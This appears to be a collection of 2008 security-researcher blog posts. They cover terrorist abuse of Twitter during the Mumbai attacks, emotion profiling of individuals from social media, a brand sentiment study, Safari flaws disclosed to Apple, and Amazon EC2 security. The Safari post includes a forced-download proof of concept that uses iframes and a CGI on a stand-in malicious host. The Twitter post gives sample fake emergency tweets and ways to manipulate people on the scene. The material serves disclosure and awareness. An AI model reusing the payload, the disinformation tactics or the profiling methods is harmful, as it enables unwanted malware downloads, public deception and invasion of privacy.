A recent US Army intelligence report identifies Twitter as a potential communication channel for terrorist activities. I think it is fantastic that intelligence efforts like this have the foresight to recognize emerging channels of communication and that effort is being put into proactively enumerating the potential use cases. Yet I am not impressed with the limited case studies presented in the report (the obvious case of Twitter being used for communication, in addition to extremely specific situations of Twitter being used to trigger explosive devices). The use cases presented in the report are a good start, but they do not go beyond the obvious scenarios. Therefore, in this article, I want to further the discussion on how micro-blogging channels may be leveraged by terrorist organizations to obtain real-time surveillance and intelligence for their efforts. I feel this sort of conversation will be beneficial to counter-intelligence efforts (I will write a separate article on how Twitter may be actively leveraged by counter-intelligence).
Before I go any further, I want to get out of the way a probable knee-jerk reaction that I suspect some readers may have at this point. I am in no way portraying Twitter or social media as evil (in fact, I'm a huge fan of Twitter and I use it on a daily basis). That would be as absurd as saying that the Internet is evil because criminals can use it to communicate. Twitter is a channel of communication - my goal is to point out the increased capabilities this channel may provide for criminal use.
I also want to point out that discussions like these are often brushed off as fantastical. Perhaps this response comes from the tendency to place too much weight on the (flawed) hypothesis that only past and known mechanisms will (re)occur in the near future. Consider 9/11: the scenario would have been brushed off as fantastical had someone had the foresight to predict it beforehand. Often, potential scenarios appear less probable not because of rational conclusions, but because of the human tendency to believe that only past scenarios have a high probability of occurrence. Nassim Nicholas Taleb makes this point, in addition to arguing that the most impactful events are the least predictable, in his book The Black Swan: The Impact of the Highly Improbable - a must-read for any security professional.
The heavily armed attackers who set out for Mumbai by sea last week navigated with Global Positioning System equipment, according to Indian investigators and police. They carried BlackBerrys, CDs holding high-resolution satellite images like those used for Google Earth maps, and multiple cellphones with switchable SIM cards that would be hard to track. They spoke by satellite telephone. And as television channels broadcast live coverage of the young men carrying out the terrorist attack, TV sets were turned on in the hotel rooms occupied by the gunmen, eyewitnesses recalled.
The authorities in India who responded to the attacks did not know about the BlackBerrys until after the fact. However, had the authorities known that the criminals possessed BlackBerrys while the attacks were ongoing, they would not have known how to leverage that knowledge. The point I'm trying to make here is that, in general, the organizations responsible for researching and responding to incidents like these seem ill-equipped because they do not know how to assess and counter the increased utilization of information technology by criminals.
While the attacks in Bombay were ongoing, Twitter seemed to light up with conversations. From citizen journalists, to concerned individuals looking for relatives, to volunteers who attempted to orchestrate blood donations, there were approximately 80 new 'tweets' on the #Mumbai channel every five seconds!
It is clear how useful a micro-blogging channel like Twitter can be to the public during situations such as the Bombay attacks. However, in the following list, I want to enumerate how potential terrorists may leverage a channel like Twitter to perform surveillance and mass manipulation of a sort that was not possible before the micro-blogging medium. The list below is presented in the context of the recent attacks in Bombay, but the ideas apply to other situations as well. This is by no means an exhaustive list, but I think it is enough to get the conversation going.
Circumventing rescue efforts. Twitter was used by citizens in the vicinity of Bombay to call upon the public for blood donations. Here is an actual Twitter message sent while the attacks were ongoing:
It is clear that Twitter messages can assist in rescue efforts, and in this case, they played a positive role in broadcasting details on where volunteers may help out by donating blood.
Now, consider a situation where a malicious party were to sign up for multiple Twitter accounts and Tweet messages similar to the one presented in this use-case but using non-existent phone numbers:
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003351 #mumbai
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003352 #mumbai
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003353 #mumbai
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003354 #mumbai
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003356 #mumbai
The potential for abuse in this case relies upon the fact that, during emergency situations, people are likely to accept and re-broadcast messages without verification. The malicious Twitter messages above, with incorrect phone numbers, are just as likely to be re-tweeted. People who are able and willing to donate blood will no longer be able to effectively utilize the micro-blogging channel to contact the proper resources.
Group sentiment analysis. The candid nature of micro-blogging channels makes them a powerful medium for capturing genuine human feelings. In my previous article, Hacking the Psyche, I presented how individual feelings from the social web, including Twitter, can be captured to create an emotion dashboard depicting past and current emotional states.
Since the goal of terror attacks is to cause terror, sentiment analysis can be a powerful tool for the attackers to measure the impact of their attacks. A mashup of an automated sentiment analysis engine built on the Twitter API, coupled with the Google Maps API, can easily give the attackers a clear visual of how their attacks are affecting the emotional states of individuals in particular locations. For example: are people in target location x upset, scared, worried, angry, or happy in response to an ongoing or recently committed attack? What locations around the world have reacted negatively or positively to the attacks?
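To make the sentiment half of such a mashup concrete, here is a minimal sketch. The tweets, locations, and word lists are hypothetical placeholders (in practice the messages would be fetched via the Twitter search API, and a real engine would use a proper sentiment lexicon); the per-location scores would then be plotted via a mapping API.

```python
from collections import defaultdict

# Placeholder word lists -- a real engine would use a proper lexicon.
NEGATIVE = {"scared", "afraid", "worried", "angry", "terrified"}
POSITIVE = {"safe", "relieved", "calm", "happy"}

def score_tweet(text):
    """Naive sentiment: +1 per positive word, -1 per negative word."""
    words = text.lower().split()
    return sum((w in POSITIVE) - (w in NEGATIVE) for w in words)

def sentiment_by_location(tweets):
    """tweets: list of (location, text) pairs.
    Returns a map of location -> average sentiment score."""
    totals, counts = defaultdict(int), defaultdict(int)
    for location, text in tweets:
        totals[location] += score_tweet(text)
        counts[location] += 1
    return {loc: totals[loc] / float(counts[loc]) for loc in totals}

# Hypothetical sample data.
tweets = [
    ("Mumbai", "I am terrified and scared right now"),
    ("Mumbai", "worried about my family"),
    ("London", "relieved to hear everyone is safe"),
]
print(sentiment_by_location(tweets))
```

Even this crude scoring, aggregated by location, would show an attacker which cities are trending negative in response to an event.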
Following the news media. This is most likely to be one of the more obvious use cases. As mentioned earlier, the terrorists in the Bombay attacks were found to have used Blackberries to keep up with news websites to measure the impact of their ongoing efforts. Instead of having to surf to multiple news media websites, it is plausible that criminals can utilize traffic in the particular channel of interest, for example #Mumbai, to find pointers (URLs) to high quality reports pre-filtered by the Twitter community. The following is a screenshot of Twitter messages in the #Mumbai channel:
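As a sketch of how that community pre-filtering might be automated (using made-up tweet text rather than the real #Mumbai stream): extract URLs from messages in the channel and rank them by how many messages mention them, since heavily re-tweeted links are a rough proxy for the reports the community considers worthwhile.

```python
import re
from collections import Counter

URL_RE = re.compile(r"https?://\S+")

def rank_urls(tweets):
    """Count URL mentions across tweets; most-mentioned first."""
    counts = Counter()
    for text in tweets:
        for url in URL_RE.findall(text):
            counts[url.rstrip(".,)")] += 1  # drop trailing punctuation
    return counts.most_common()

# Hypothetical messages from a hashtag channel.
tweets = [
    "Live updates here: http://example.com/liveblog #mumbai",
    "RT: http://example.com/liveblog is the best coverage #mumbai",
    "Photos at http://example.com/photos #mumbai",
]
for url, n in rank_urls(tweets):
    print(n, url)
```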
Leveraging and manipulating citizen journalists. Individuals in the vicinity of the ongoing attacks in Bombay were providing first-hand reporting of police efforts. This information is likely to be extremely useful to the criminals.
Furthermore, individuals on the scene may be remotely manipulated into providing specific information that a criminal may be seeking. For example, the following message could be posted to the #Mumbai channel by a malicious entity seeking further details: "Can anyone on-site please confirm the number of choppers above Nariman house asap?"
Data poisoning police efforts. In a future article, I will attempt to enumerate ideas on how police may be able to utilize social media, one of the use cases being the ability to leverage information from citizen journalists to strategize counter-efforts. A malicious response to this is likely to take the form of data poisoning, where the malicious party posts false information onto the micro-blogging channels while posing as citizen journalists.
Geo-locating and instigating further panic. One of the goals of terrorism is to instigate panic. Many Twitter clients, especially those that run on mobile platforms, allow users to tag their messages with their specific geo-location. This information can be queried and coupled with the sentiment analysis discussed above to measure the level of panic in specific geographical locations.
Further panic and unrest may be instigated by spreading false rumors. From the malicious party's perspective, it is a lot cheaper to create panic by spreading rumors than by carrying out physical attacks. To illustrate, consider the messages that overwhelmed the #Mumbai channel after a single Twitter message suggested that the terrorists might be reading the information being posted. It is unlikely that the terrorists in the Mumbai incidents were actually reading Twitter, but the point I'm trying to make here is how fast such a rumor can spread.
So what does all of this mean? The goal of this article is to spread awareness and raise consciousness. The ideas presented here may appear far-fetched at the moment, but with the explosive growth and integration of social applications into the lives of the Generation Y culture, it is increasingly probable that malicious parties will leverage social media channels as time progresses. I feel it is important that we have a good grasp of how criminals may utilize these channels so that we better understand the tactics of the enemies we are likely to deal with in the future.
Perhaps it may also be useful to extend this thought process to criminal use of social media in terms of cyber-warfare. Many people expect cyber-warfare tactics to be limited to defects in the network and application layers, yet it is increasingly plausible that government-sponsored crime may adopt use cases that leverage social applications. The abuse of sentiment analysis discussed in my Hacking the Psyche article illustrates one such example. If you are interested in this topic and you are in New York during January 6 - 8, I will be speaking at the 2009 International Conference on Cyber Security.
In a previous article, Hacking the Psyche, I presented the security and privacy implications of capturing feelings of individuals using on-line mechanisms for good use as well as abuse and manipulation. Whenever controls around individual privacy are called into question, there is always, on the other side of the coin, a clear business opportunity.
Corporations often use indirect data such as demographic information and sales statistics to measure the health of their brand because the direct data, i.e. how the public and their customers actually feel about their brand, is not available for capture. In this article, I want to put forth a case study to demonstrate how capturing feelings on the social web can allow companies to measure the reputation of their brand.
In September 2008, Microsoft reportedly paid Jerry Seinfeld $10 million to star in its recent TV commercial campaign. In this article, I want to provide evidence supporting the hypothesis that Microsoft, in addition to paying Seinfeld, suffered the additional cost of damage to its brand from the commercials. On a positive note, the I'm a PC commercial that followed seems to have made up for some of the damage.
Here are the TV advertisements:
September 4, 2008: Shoe Circus [starring Jerry Seinfeld and Bill Gates]
September 11, 2008: New Family [starring Jerry Seinfeld and Bill Gates]
September 18, 2008: I'm a PC [not starring Jerry Seinfeld]
Now, let's turn to Twitter to measure the feelings expressed towards these commercials during the month of September 2008. Using the Emotion Dashboard tool I presented in Hacking the Psyche, I was able to visualize how people on Twitter felt about these commercials. Here's a video of the tool in action:
There you have it: a powerful method to use feelings expressed in social media to measure a corporation's brand and marketing efforts.
Brand reconnaissance is not the only effort that can be leveraged from feelings on the social web. If you are interested in this topic, I invite you to consider my upcoming talk at the O'Reilly Money:Tech Conference titled Emotion Dashboard: Harvesting Feelings on the Social Web for Powerful Decisioning.
Tim O'Reilly recently blogged about why he supports Barack Obama. Following this, in a more recent blog entry, Tim addresses some complaints from readers who dismissed his endorsement of Obama as out of line for a technical site such as O'Reilly.
I think Tim did the right thing in putting up the blog entry about his endorsement of Obama. Even though Tim himself may see some justice in one reader's displeasure about the blog entry showing up in the News section, I don't see a problem with it. Tim is a well-known technologist - his endorsement and, most importantly, the reasoning behind his endorsement are news to me and I want to read them.
I feel that, as technologists and scientists, we have the right and the duty to engage in critical thought and express opinions on topics that are important to the world and to society; the job of information technology is a lot more than just discussing software and hardware for the sake of discussing software and hardware.
My enthusiasm for technology ultimately derives from my appreciation for the most well known method of evaluating and finding out what is true in the universe: Science. Therefore, I want to extend this issue beyond the O'Reilly case to point out two topics that are often labeled taboo and consequently banned from discussion on many intellectual forums and venues: politics and religion.
I feel the science community at large has played along with this taboo for far too long, handling the matters of politics and religion with kid gloves. These are important topics that affect our lives today and the lives of future generations.
Venues such as O'Reilly are not likely to discuss politics or religion often. Yet, as scientists and technologists, when we do have something to say that addresses an important topic where we can offer reasoning and critical thought - let's not be shy about it. The illogical, taboo-based counter-claim, mostly along the lines of "You are not supposed to talk about x." "Why not?" "Because you are not.", is dangerous because it shuts Science out of contributing much-needed critical thought and reasoning to important topics that shape our world.
In this article, I want to persuade you of the real possibility and high probability that, in the very near future, remote entities will be able to target people's on-line presence to capture and leverage their emotional states and feelings. There are some very extreme implications of this from a security and privacy perspective, and this is the scope I will adhere to in this article. On the flip side, the ideas presented here can be leveraged to construct powerful business decisioning and measurement capabilities, a topic that deserves its own space - I will cover it in a separate article in the next few days.
Before I go any further, I want to stress that the purpose of this article is not to spread undue alarm, nor is the purpose to portray social online media as an evil. I personally utilize the many avenues of online communication and collaboration facilitated by the Generation Y culture. The purpose of this article, instead, is to share some of my initial thoughts on the possibilities of abuse, specific to the mapping of individual feelings online and possible implications.
We Feel Fine.
To begin with, I insist that you watch Jonathan Harris’ TED talk titled The Art of Collecting Stories:
In this talk, Jonathan describes his passion for making sense of the emotional world and his deep compassion for the human condition. Regardless of this particular article, Jonathan's talk stands on its own. I think Jonathan's ideas, projects, and aspirations are true works of art. His ideas are powerful enough to inspire a security professional such as myself to look outside the oft-incestuous world of information security, and to reach out and connect with other venues of Science and understanding. In a small way, the material presented in this article is my attempt to do just that.
I invite you to visit one of Jonathan’s projects that he co-founded with Sep Kamvar - We Feel Fine :
Since August 2005, We Feel Fine has been harvesting human feelings from a large number of weblogs. Every few minutes, the system searches the world's newly posted blog entries for occurrences of the phrases "I feel" and "I am feeling". When it finds such a phrase, it records the full sentence, up to the period, and identifies the "feeling" expressed in that sentence (e.g. sad, happy, depressed, etc.). Because blogs are structured in largely standard ways, the age, gender, and geographical location of the author can often be extracted and saved along with the sentence, as can the local weather conditions at the time the sentence was written. All of this information is saved.
The result is a database of several million human feelings, increasing by 15,000 - 20,000 new feelings per day. Using a series of playful interfaces, the feelings can be searched and sorted across a number of demographic slices, offering responses to specific questions like: do Europeans feel sad more often than Americans? Do women feel fat more often than men? Does rainy weather affect how we feel? What are the most representative feelings of female New Yorkers in their 20s? What do people feel right now in Baghdad? What were people feeling on Valentine's Day? Which are the happiest cities in the world? The saddest? And so on.
At its core, We Feel Fine is an artwork authored by everyone. It will grow and change as we grow and change, reflecting what's on our blogs, what's in our hearts, what's in our minds. We hope it makes the world seem a little smaller, and we hope it helps people see beauty in the everyday ups and downs of life.
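The harvesting step described in the quote above can be sketched roughly as follows. This is my own illustrative approximation, not We Feel Fine's actual code; the feeling lexicon here is a tiny stand-in for their much larger list.

```python
import re

# Capture the sentence (up to the period) containing "I feel" or
# "I am feeling", roughly as the project description above outlines.
FEELING_RE = re.compile(
    r"([^.]*\bI (?:feel|am feeling)\b[^.]*)\.", re.IGNORECASE)

# A small placeholder lexicon; the real system recognizes thousands.
KNOWN_FEELINGS = {"sad", "happy", "depressed", "lonely", "better"}

def harvest_feelings(post):
    """Return (sentence, feeling) pairs found in a blog post."""
    results = []
    for match in FEELING_RE.finditer(post):
        sentence = match.group(1).strip()
        feeling = next(
            (w for w in sentence.lower().split() if w in KNOWN_FEELINGS),
            None)
        if feeling:
            results.append((sentence, feeling))
    return results

post = ("It rained all day. I feel sad about the weather. "
        "Tomorrow I am feeling better already.")
print(harvest_feelings(post))
```

Run against the firehose of newly posted blog entries, an extractor like this is what turns free-form writing into a searchable database of feelings.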
Here is a video I uploaded to YouTube, demonstrating We Feel Fine's interface, including the ability to filter for specific targets (for example: feelings expressed by individuals in their 20s in Iraq):
Emotion Dashboard: Targeting Individuals.
The We Feel Fine project does not target specific individuals. The creators of the project imply that doing so would violate an individual's privacy:
Privacy: We Feel Fine only collects and displays data that was already posted publicly on the World Wide Web. We Feel Fine never associates individual human names with the feelings it displays, though it always provides a link to the blog from which any displayed sentence or picture was collected....
We Feel Fine is a work of art designed by well-meaning intellectuals. It has neither the capability nor the intention of intruding on any one particular person's privacy, yet the project raised my personal consciousness towards the security and privacy implications of capturing the feelings (past and present) of individuals.
To pursue discussion around the possibility and implications of capturing feelings projected by individuals online, I decided to develop a proof of concept visualization tool that I will call Emotion Dashboard. This is not a production-ready tool of any sort because I do not currently have the resources to develop such a thing. The goal of this tool (if you should even call it a tool) is to demonstrate my ideas and my vision on this particular topic to facilitate and encourage further discussion in the community. Here are the components of Emotion Dashboard:
In other words, the targeted individual’s online presence may include his or her Facebook profile updates, Blogs, and Twitter messages. In this way, updates on all of the sources of a particular individual’s online presence can be coupled together in one RSS feed and then supplied to Emotion Dashboard which will scan the feed from the past to the present (older entries first).
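A minimal sketch of that aggregation step is below, assuming the entries from each source have already been fetched and parsed (in practice via a feed parsing library and an RSS aggregation service); the sources, timestamps, and entry text are hypothetical.

```python
from datetime import datetime

# Hypothetical pre-parsed entries from each of the target's sources,
# as (timestamp, text) pairs.
facebook = [("2008-09-01 10:00", "feeling great about the new job")]
blog     = [("2008-09-03 18:30", "I feel exhausted and angry today")]
twitter  = [("2008-09-02 09:15", "so happy it is finally sunny")]

def merged_timeline(*sources):
    """Combine entries from all sources into one stream, oldest
    first, as the Emotion Dashboard would consume them."""
    entries = [e for source in sources for e in source]
    return sorted(
        entries,
        key=lambda e: datetime.strptime(e[0], "%Y-%m-%d %H:%M"))

for stamp, text in merged_timeline(facebook, blog, twitter):
    print(stamp, text)
```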
Immediately below the line graph is a solid bar that expresses the culmination of the individual's overall mood. The color of this bar is either Yellow (happy), Blue (sad), or Red (angry). The hex codes for these colors are also derived from the We Feel Fine CSV file listed above.
I concede that this technique of merely grepping for words lacks context and that it is prone to an extremely high error rate. However, given the limited resources I have at this point, my goal is not to provide something that is readily usable in all cases, but to present a starting point for a possible approach and the probable implications should it be extended with intelligent, grammar-based contextual analysis. Do note that, even though I concede this approach is vulnerable to a high error rate, the technique does, statistically speaking, get slightly more accurate the more words it consumes.
The word cloud allows the user to analyze the words being used to express feelings as the Emotion Dashboard reads the RSS feed from past to present. The words in the cloud are colored based on the associated hex color codes present in the CSV file.
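The word-matching approach conceded above can be sketched as follows. The inline CSV here is a tiny stand-in for the We Feel Fine file (word, mood bucket, hex color); the words and colors are illustrative, not the actual data.

```python
import csv
import io
from collections import Counter

# Stand-in for the We Feel Fine CSV: word, mood bucket, hex color.
LEXICON_CSV = """\
happy,happy,#ffff00
cheerful,happy,#ffe000
sad,sad,#0000ff
lonely,sad,#3333cc
angry,angry,#ff0000
furious,angry,#cc0000
"""

def load_lexicon(text):
    reader = csv.reader(io.StringIO(text))
    return {word: (mood, color) for word, mood, color in reader}

def classify(entry, lexicon):
    """Grep the entry for known emotion words; return mood counts.
    As conceded above, this has no grammatical context and a high
    error rate -- a starting point, not a finished engine."""
    counts = Counter()
    for word in entry.lower().split():
        word = word.strip(".,!?")
        if word in lexicon:
            counts[lexicon[word][0]] += 1
    return counts

lexicon = load_lexicon(LEXICON_CSV)
print(classify("I am so angry and sad, furious even", lexicon))
```

The mood counts drive the line graph and the colored bar, while the matched words and their hex colors feed the word cloud.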
The following screenshot demonstrates sample output for the online presence of an individual whom we will call "Jack Smith" for the purposes of this discussion:
Here are some observations and implications:
Once enough information about Jack is collected to reasonably satisfy the personality test requirements, Jack's personality patterns can be determined, which may aid a malicious third party in exploiting Jack's current emotional state. It is also plausible that this can be extended to automated, trigger-based capabilities. This is an extremely powerful idea - Jack may not be consciously aware of his negative mood, yet a third party may be able to infer it remotely with some degree of probability. The following is a screen-shot of the results of a Big 5-like personality test (courtesy of Signal Patterns):
Case Study: Criminal Investigation and Analysis.
There are numerous security and privacy implications of the discussion at hand, and I am unlikely to succeed in enumerating them all. Instead, I want to present one particular case study that further illustrates the impact of this topic.
In this case study, I want to take up the following real incident: http://blog.mlive.com/chronicle/2008/07/excon_vents_pain_online_then_k.html
Ex-con vents pain online, then kills
OCEANA COUNTY -- Danlee Mead was apparently using his MySpace site to tell the world how unhappy and desperate he felt in the hours before he abducted and killed his wife, then turned a shotgun on himself.... Hours later, the depth of the ex-convict's anguish turned to violence.....
A cached copy of Danlee's MySpace page suggests that he changed his profile (moments before he committed the violent act) to use more positive-sounding words, even though his overall thoughts remained negative. His prior profile also consisted of negative feelings, yet its words were more negative-sounding. Here is a demonstration of what his profile looks like when run through an analysis over time:
A few observations:
Following from the above observations, it is clear to see how this type of analysis can be used by investigators, admittedly after-the-fact, to get a glimpse into a suspect's state of mind over time.
It may not be possible to use data from online social media to proactively predict the future behavior of all individuals, yet in this situation, the criminal did indeed have a prior history of crimes. Perhaps a proactive approach targeted at known suspects' online social presence can be used to detect deviations from tuned thresholds - possibly in an automatic fashion based on a set of defined triggers. Such an approach seems more tolerable for a set of individuals with known backgrounds because the elements of their history can shift the signal-to-noise ratio in favor of the signal.
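As a sketch of the trigger idea: assuming a per-entry negativity score is already available (for example, from the word-matching approach earlier), flag the point where a short-term average deviates from the subject's running baseline by more than a tuned threshold. The scores, window, and threshold below are illustrative placeholders, not calibrated values.

```python
def deviance_trigger(scores, window=3, threshold=1.0):
    """Return the indices where the mean of the last `window`
    negativity scores exceeds the running baseline (mean of all
    earlier scores) by more than `threshold`."""
    alerts = []
    for i in range(window, len(scores)):
        baseline = sum(scores[:i]) / float(i)
        recent = sum(scores[i - window:i]) / float(window)
        if recent - baseline > threshold:
            alerts.append(i)
    return alerts

# Hypothetical negativity scores per post, oldest first: a calm
# baseline followed by a sharp negative turn.
scores = [1, 0, 1, 1, 0, 4, 5, 6]
print(deviance_trigger(scores))
```

In an automated deployment, each alert index would correspond to a point in the suspect's timeline worth a human analyst's attention.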
Some Additional Thoughts.
The prior case study was just one illustration of the many impacts of using social media to capture the psyche of individuals. Here are some additional thoughts:
To conclude, I sincerely hope this article facilitates further discussion around the topics presented. You may feel that the probability of some of my thoughts and ideas coming to fruition is low. Perhaps you find them extremely fantastical, or perhaps you agree that the scenarios presented have a high probability of being relevant in the near future. I am obviously intrigued by the topic and I'd be delighted to hear your thoughts.
During the next few months, I will be presenting a brand-new talk titled "Suddenly Psychic: Knowing Everything About Everyone" at various conferences around the world. I will be presenting it with Akshay Aggarwal, a good friend of mine. Akshay and I have enjoyed researching the business, security, criminal, social, and psychological implications of this topic, and we look forward to sharing our research with you.
Currently, this talk is scheduled to debut at the Microsoft Blue Hat Conference [v8] in October, followed by Hack in the Box in Kuala Lumpur.
TITLE: Suddenly Psychic: Knowing Everything About Everyone
Imagine a world where you can remotely influence other people's behavior. This talk will expose how information about people in the physical world, coupled with voluntary information from new communication paradigms such as social networking applications, can enable you to remotely read people's minds to influence their behavior.
Topics of discussion will include:
The goal of this presentation is to raise consciousness about how the new paradigms of social communication bring with them real risks as well as marketing and economic advantages. Perspectives on negative and positive uses will be presented, in addition to academic discussions and thoughts on how to enable the upcoming online social age.
I presented "Bad Sushi: Beating Phishers at their Own Game" with Billy at the Microsoft Blue Hat 2008 conference. It was a great opportunity to get to know the Microsoft security and product teams. I'd like to thank Billy Rios, Andrew Cushman, Katie Moussouris, Sarah Blankinship, Celene Temkin, Dana Hehl, and the rest of the Blue Hat team for inviting me.
Speaking of Microsoft, I'm moving to Seattle tomorrow. I'm looking forward to getting in touch with a lot of old friends there so that should be good. If you are in the area, just let me know - it will be good to catch up.
I recently communicated 3 security issues in the Safari browser to Apple.
Apple let me know that they will fix 1 of the issues I reported. I will not discuss the vulnerability Apple has promised to fix until they release the fix because it is a high risk issue affecting Safari on OSX and Windows.
I let Apple know that I'd like to discuss the 2 issues they won't be fixing with the security community and they let me know they are fine with it. A quote from my last email to Apple:
...since you do not consider issue 1 and 2 to be security related, I will feel free to discuss my thoughts within the information security community. Just let me know if you would like me to wait for some amount of time before I do this.
Response from Apple: We understand if you want to discuss these in the security community.
Before I get to the details, I want to make it extremely clear that the Apple security team has been a pleasure to communicate with. I sent them a couple of emails asking for clarifications, and they responded quickly and courteously every time. I want to publicly acknowledge that I appreciate this very much.
Here are the issues I reported:
1. Safari Carpet Bomb. It is possible for a rogue website to litter the user's Desktop (Windows) or Downloads directory (~/Downloads/ in OSX). This can happen because the Safari browser cannot be configured to obtain the user's permission before it downloads a resource. Safari downloads the resource without the user's consent and places it in a default location (unless changed).
Assume you visit a malicious site,
http://malicious.example.com/, that serves the following HTML:
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
Now assume that
http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:
print "Content-type: blah/blah\n\n"
Since Safari does not know how to render blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served. If you are using Safari on Windows, this is what will happen to your desktop once you visit http://malicious.example.com/ :
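For completeness, here is a runnable sketch of such a CGI in Python (the one-liner above is the essential part). The content type and payload are arbitrary: any response the browser cannot render triggers the automatic download.

```python
#!/usr/bin/env python
# carpet_bomb.cgi (sketch): respond with a Content-Type that Safari
# cannot render, so the browser writes the body straight to disk.
import sys

def respond(out):
    out.write("Content-Type: blah/blah\r\n")
    out.write("\r\n")                       # blank line ends the headers
    out.write("arbitrary payload bytes\n")  # what lands on the Desktop

if __name__ == "__main__":
    respond(sys.stdout)
```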
The implication of this is obvious: Malware downloaded to the user's desktop without the user's consent.
Apple does not feel this is an issue they want to tackle at this time. In my most recent email to Apple, I suggested that they incorporate an option in Safari so the browser can be configured to ask the user before anything is downloaded to the local file system. Apple agreed it was a good suggestion:
...the ability to have a preference to "Ask me before downloading anything" is a good suggestion. We can file that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. This will require a review with the Human Interface team. We want to set your expectations that this could take quite a while, if it ever gets incorporated.
[credit to BK have-it-your-way Rios for suggesting the term "Carpet Bomb" to describe this issue].
2. Sandbox not Applied to Local Resources. This issue is more of a feature request than a vulnerability. For example, Internet Explorer warns users when a local resource such as an HTML file attempts to invoke client-side scripting. I feel this is an important security feature because of user expectations: even the most sophisticated users differentiate between the risk of clicking on an executable they have downloaded (risk perceived to be higher) and clicking on an HTML file they have downloaded (risk perceived to be lower).
Apple's response was positive:
...we have been investigating the potential for a "safe" mode for local HTML. This is an area that requires a fairly deep investigation to address compatibility issues, and to determine the proper operation. Please understand that when we label this as a security hardening measure, we are not discounting the benefits that this could have.
3. [Undisclosed]. The third issue I reported to Apple is a high risk vulnerability in Safari that can be used to remotely steal local files from the user's file system. Apple responded positively and let me know that they are actively working to resolve the issue and release a patch. I will post an update if I hear back from them.
I'd like to thank the Apple security team for their timely responses and for letting me discuss these issues with the security community.
The Cloud Computing buzz is everywhere. The concept of grid computing on the Internet to provide elasticity and virtualization of resources is quite appealing, and hence there has been a lot of academic brain-storming going on recently that has given rise to abstract ideas on how cloud computing is destined to change the way technology resources are deployed and used.
Until now, small developers did not have the capital to acquire massive compute resources and ensure they had the capacity they needed to handle unexpected spikes in load. Amazon EC2 enables any developer to leverage Amazon's own benefits of massive scale with no up-front investment or performance compromises. Developers are now free to innovate knowing that no matter how successful their businesses become, it will be inexpensive and simple to ensure they have the compute capacity they need to meet their business requirements.
The "Elastic" nature of the service allows developers to instantly scale to meet spikes in traffic or demand. When computing requirements unexpectedly change (up or down), Amazon EC2 can instantly respond, meaning that developers have the ability to control how many resources are in use at any given point in time. In contrast, traditional hosting services generally provide a fixed number of resources for a fixed amount of time, meaning that users have a limited ability to easily respond when their usage is rapidly changing, unpredictable, or is known to experience large peaks at various intervals.
I was able to go through the Getting Started Guide and I had myself a Linux environment in the Amazon cloud in no time:
Amazon EC2 presents a true virtual computing environment, allowing you to use web service interfaces to requisition machines for use, load them with your custom application environment, manage your network's access permissions, and run your image using as many or few systems as you desire.
To use Amazon EC2, you simply:
* Create an Amazon Machine Image (AMI) containing your applications, libraries, data and associated configuration settings. Or use pre-configured, templated images to get up and running immediately.
* Upload the AMI into Amazon S3. Amazon EC2 provides tools that make storing the AMI simple. Amazon S3 provides a safe, reliable and fast repository to store your images.
* Use Amazon EC2 web service to configure security and network access.
* Start, terminate, and monitor as many instances of your AMI as needed, using the web service APIs.
* Pay only for the resources that you actually consume, like instance-hours or data transfer.
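Putting the steps above together, here is a hypothetical sketch of the workflow using the classic EC2 command-line tools. All image names, bucket names, account numbers, and IDs below are placeholders, and the script is written as a dry run that prints each command rather than executing it:

```shell
# Dry-run sketch of the AMI workflow above. The run() wrapper prints each
# command instead of executing it; all names and IDs are made-up placeholders.
set -eu
run() { printf '%s\n' "$*"; }

# 1. Bundle a machine image and sign it with your key-pair
run ec2-bundle-image -i my-image.img -k pk.pem -c cert.pem -u 111122223333
# 2. Upload the bundle to S3 and register it as an AMI
run ec2-upload-bundle -b my-ami-bucket -m my-image.img.manifest.xml
run ec2-register my-ami-bucket/my-image.img.manifest.xml
# 3. Instances boot firewalled - explicitly open inbound SSH on the default group
run ec2-authorize default -p 22
# 4. Start, monitor, and terminate instances via the web service tools
run ec2-run-instances ami-12345678 -k my-keypair
run ec2-describe-instances
run ec2-terminate-instances i-12345678
```

You only pay while instances from the last step are actually running, which is what makes the elasticity story work economically.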
Based on my recent experience, here are some initial thoughts (with bias on security):
To add your AMI:
1. Make sure you're logged in to the site.
2. Click the "Add a Document" link in the Tools box to the right.
3. Enter as much information as possible in the form, then click Preview. (Tip: You can use HTML in the listing body.)
4. If everything looks good, click Submit. Otherwise, click "Go Back/Edit" and make your corrections.
Important: Your listing will show up on the site after a quick review by AWS.
Interesting. I wonder what the "quick review" entails. What if someone submits an AMI with a back-door installed? Does the Amazon team have the resources and processes to identify malicious AMIs before sharing them with their customers?
Keys to the Cloud. The Amazon services are based upon a key-based approach (you get your own key-pair to authenticate to Amazon and to sign your own AMIs) - this is good. There is the burden of key management, but it is still a better approach than implementing a static password-based system.
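To illustrate the key-based model, here is a rough sketch of how query-string request signing worked in that generation of AWS APIs (Signature Version 1 style: HMAC-SHA1 over the sorted request parameters). The parameter values and the secret key below are made up for illustration:

```python
import base64
import hashlib
import hmac

def sign_request(params, secret_key):
    # Signature Version 1 style: sort parameters case-insensitively by name,
    # concatenate each name and value with no separators, then compute an
    # HMAC-SHA1 over the result using the account's secret key.
    to_sign = "".join(k + v for k, v in sorted(params.items(),
                                               key=lambda kv: kv[0].lower()))
    digest = hmac.new(secret_key.encode(), to_sign.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()

params = {"Action": "RunInstances", "ImageId": "ami-12345678",
          "AWSAccessKeyId": "AKIDEXAMPLE"}
print(sign_request(params, "my-secret-key"))
```

The appeal over static passwords is that the secret never travels over the wire - only signatures derived from it do, and each signature is bound to a specific request.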
Firewall. Instances initially boot in a firewalled environment where you have to explicitly open up ports to allow inbound access. This is a good approach as well.
Dude, Where's My Data? Data in the virtual instance only persists as long as the instance is running. From Amazon's FAQ:
Q: What happens to my data when a system terminates?
The data stored on a specific instance persists only as long as that instance is alive. You have several options to persist your data:
